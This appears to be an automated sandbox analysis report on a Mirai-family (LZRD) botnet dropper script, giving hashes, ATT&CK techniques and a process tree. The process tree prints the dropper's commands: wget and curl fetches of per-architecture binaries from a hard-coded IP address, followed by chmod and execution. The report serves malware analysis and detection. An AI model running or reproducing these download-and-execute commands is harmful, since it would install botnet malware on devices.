Analysis
-
max time kernel
139s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-12-2024 07:44
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
5900bec79ec2bba33659f8a9dfe92eb6
-
SHA1
73ec8e41322311f983e35396c66fab7ab580aa72
-
SHA256
984686cc7b69066b7963531fa7948f8134fa9fd2f5beabcea849b2e5d852cbcc
-
SHA512
671afe06a8c6d5108d48010d0ff4697c514e0febcbfd602d2953f9e13469ea05761386b9500b5a4d52b57b45f7cc037282b657110676f52f2d95f54cc2896a42
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 710 chmod 768 chmod 835 chmod 865 chmod 682 chmod 736 chmod 806 chmod 846 chmod 693 chmod 723 chmod 750 chmod 820 chmod 859 chmod 699 chmod 853 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 684 Space /tmp/Space 694 Space /tmp/Space 700 Space /tmp/Space 711 Space /tmp/Space 725 Space /tmp/Space 737 Space /tmp/Space 751 Space /tmp/Space 769 Space /tmp/Space 808 Space /tmp/Space 821 Space /tmp/Space 836 Space /tmp/Space 847 Space /tmp/Space 854 Space /tmp/Space 860 Space /tmp/Space 866 Space -
Modifies Watchdog functionality 1 TTPs 6 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 6 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx -
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/772/status Space File opened for reading /proc/7/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/2/status Space File opened for reading /proc/4/status Space File opened for reading /proc/18/status Space File opened for reading /proc/41/status Space File opened for reading /proc/109/status Space File opened for reading /proc/260/status Space File opened for reading /proc/self/exe Space File opened for reading /proc/43/status Space File opened for reading /proc/140/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/272/status Space File opened for reading /proc/76/status Space File opened for reading /proc/290/status Space File opened for reading /proc/419/status Space File opened for reading /proc/19/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/824/status Space File opened for reading /proc/14/status Space File opened for reading /proc/463/status Space File opened for reading /proc/831/status Space File opened for reading /proc/11/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/24/status Space File opened for reading /proc/151/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/11/status Space File opened for reading /proc/300/status Space File opened for reading /proc/653/status Space File opened for reading /proc/106/status Space File opened for reading /proc/109/status Space File opened for reading /proc/26/status Space File opened for reading /proc/109/status Space File opened for reading /proc/608/status Space File opened for reading /proc/17/status Space File opened for reading /proc/272/status Space File opened for reading /proc/463/status Space File opened for reading /proc/96/status Space File opened for reading /proc/651/status Space File opened for reading /proc/654/status Space File opened for reading /proc/18/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/106/status Space File opened for reading /proc/464/status Space File opened for reading /proc/10/status Space File opened for reading /proc/747/status Space File opened for reading /proc/140/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/10/status Space File opened for reading /proc/821/status Space File opened for reading /proc/41/status Space File opened for reading /proc/filesystems cp File opened for reading /proc/25/status Space File opened for reading /proc/96/status Space File opened for reading /proc/42/status Space File opened for reading /proc/837/status Space File opened for reading /proc/645/status Space File opened for reading /proc/28/status Space File opened for reading /proc/29/status Space File opened for reading /proc/270/status Space -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 714 wget 718 curl 722 cat 728 wget 731 curl 734 cat -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.sh4 curl File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.arm6 wget
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:653 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:663
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/catcat Space.arc2⤵PID:681
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:684
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:687
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.x862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:690
-
-
/bin/catcat Space.x862⤵PID:692
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:694
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:696
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.x86_642⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:697
-
-
/bin/catcat Space.x86_642⤵PID:698
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:700
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.i6862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:703
-
-
/bin/catcat Space.i6862⤵PID:708
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:710
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:711
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:714
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.mips2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:718
-
-
/bin/catcat Space.mips2⤵
- System Network Configuration Discovery
PID:722
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:725
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.mips642⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:731
-
-
/bin/catcat Space.mips642⤵
- System Network Configuration Discovery
PID:734
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:737
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:739
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:742
-
-
/bin/catcat Space.mpsl2⤵PID:749
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:753
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/catcat Space.arm2⤵PID:766
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:769
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/catcat Space.arm52⤵PID:804
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:808
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/catcat Space.arm62⤵PID:819
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-54ymJG2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:821
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:832
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/catcat Space.arm72⤵PID:834
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:836
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:843
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.ppc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:844
-
-
/bin/catcat Space.ppc2⤵PID:845
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:847
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.sparc2⤵PID:849
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.sparc2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:850
-
-
/bin/catcat Space.sparc2⤵PID:852
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:854
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:855
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/catcat Space.m68k2⤵PID:858
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:860
-
-
/usr/bin/wgetwget http://154.216.16.63/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:862
-
-
/usr/bin/curlcurl -O http://154.216.16.63/hiddenbin/Space.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/catcat Space.sh42⤵PID:864
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_642⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:866
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5040ffa7428eb327e862d8ef760f9b0b7
SHA1a5d63558608159d11599e17fc22418e8d6be37e3
SHA256a0a8b1e5a745d6a769d6bad18629d8e3219220184b70c0bf35d57e677f15547e
SHA5128c17678e8b2bb096a01bcbf633fd0cde40b77519508165d8e6b1dc9634654156e6064ad1d67544b52bebbadcb2bdc3cccec301ff1fd6ce4750d0eb290be2087f
-
Filesize
36KB
MD5aa82aa3706c22bdd6d4f288b0fe8c882
SHA128b4778ba027a480e268e939210a36d2a35fc8eb
SHA2561cc788b1d69773ce52ca540c300446be443e57f60efeb569c82878575b5ddedb
SHA5122c1ea9ee8e54526e9e904b8e471c0a4f73601445c9c7c915cc186044d68c8d4e7a86665601ce5ac91c2b55a2d126ec47d38f23c1997047701246be7ca2a213b9
-
Filesize
37KB
MD5724ceb0c8889d6bb6ce97da308506389
SHA1549747750f3b7e4344fc04e2d82137b3dcd27d2f
SHA256f16eb5362f277c5800d8379207aa4d1536e9ef8f2be8ecc15e4076649cf7a768
SHA512a09f8a0bec22efff6a7fb985b9b63522f8d05368561c26188b2ec2144b5b719fc98e535b572f4f374084dbf06550fc137b3bb0412bc1f67948bdba29a6de7a22
-
Filesize
43KB
MD53a88b7783ab51e838292079e1afcf783
SHA102406ef1d2a10e3f0df5b650d67ffc481da014b9
SHA2569491ebbe2aa9be31814cddddfc98c71d8b0f30ce39ab31a7f5beb2a851f18e9f
SHA5126774bb228a758e5cda47f4ec8bc55906389c55a53c8fa2def843561733fde2f85d8a91573f25d6e8a03bf1aec4385136ff0db05986c688beba6344b9a1c1f521
-
Filesize
95KB
MD5ca95c8e2f038ed1f5811474d8d780b21
SHA1ba5a2d1dafee13289aff49e5994b3fb4c319661f
SHA256ca2e5567774a34ad0980543cfa48c9859ccd4f0f395fa6a5d54cb951b33e6723
SHA512d68845794f5d040bf1b001f65494caf8901164ebb71c2a0e15b97653b723812591a9fe7ece4299fb6ff8607ddd252480d5fdc0bfbf4beaf6b6cff2f22f3e305d
-
Filesize
113KB
MD52b28ad39d8447ff98e4880a5f4518f5d
SHA15829d16ccff2037972e268c6ec1c23737c641fa1
SHA25662456a156cd7b4ddc7254c08bb0c56d93480d8b72a21d045eb44da76fbc5fdba
SHA5123962452902afb695ab1cd060f6a2563fedf0c304bca7e5c8dd9af95a9e7bbaabdc08b7f4ba9d2dc463519bcb0a61c6f9357b3a172c10cca79bdbb2cf7984a86f
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555